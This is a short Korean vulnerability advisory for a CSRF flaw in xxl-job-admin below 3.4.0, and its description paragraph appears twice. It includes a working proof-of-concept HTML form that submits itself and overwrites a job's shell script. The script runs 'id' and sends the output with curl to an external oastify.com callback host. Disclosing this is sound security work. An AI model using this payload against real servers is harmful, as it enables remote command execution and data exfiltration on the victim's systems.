
xxl-job-admin 웹 애플리케이션에 사이트 간 요청 위조(CSRF) 취약점이 존재하여 공격자가 Glue IDE 셸 스크립트에 대한 인가되지 않은 수정을 수행할 수 있습니다. 영향을 받는 엔드포인트는 적절한 CSRF 토큰 검증이 부재하며, 허용적인 요청 매핑을 통해 임의의 HTTP 메서드를 수용합니다.
xxl-job-admin 웹 애플리케이션에는 공격자가 Glue IDE 셸 스크립트를 무단으로 수정할 수 있게 하는 CSRF(사이트 간 요청 위조) 취약점이 존재합니다. 영향을 받는 엔드포인트는 적절한 CSRF 토큰 검증이 없으며, 관대한 요청 매핑을 통해 임의의 HTTP 메서드를 허용합니다.
xxl-job < 3.4.0
공격자는 인증된 관리자를 속여 Glue IDE 셸 스크립트를 무단으로 변경하도록 만들 수 있습니다.
// Decode and change it
<html>
<body>
<form action="https://domain.com/jobcode/save">
<input type="hidden" name="id" value="294" />
<input type="hidden" name="glueSource" value="#!/bin/bash id | curl -d @- http://qic8br6d6om2j459zk4evuimldr4f03p.oastify.com  exit 0 " />
<input type="hidden" name="glueRemark" value="12345" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
크레딧: Ibrahim Sartawi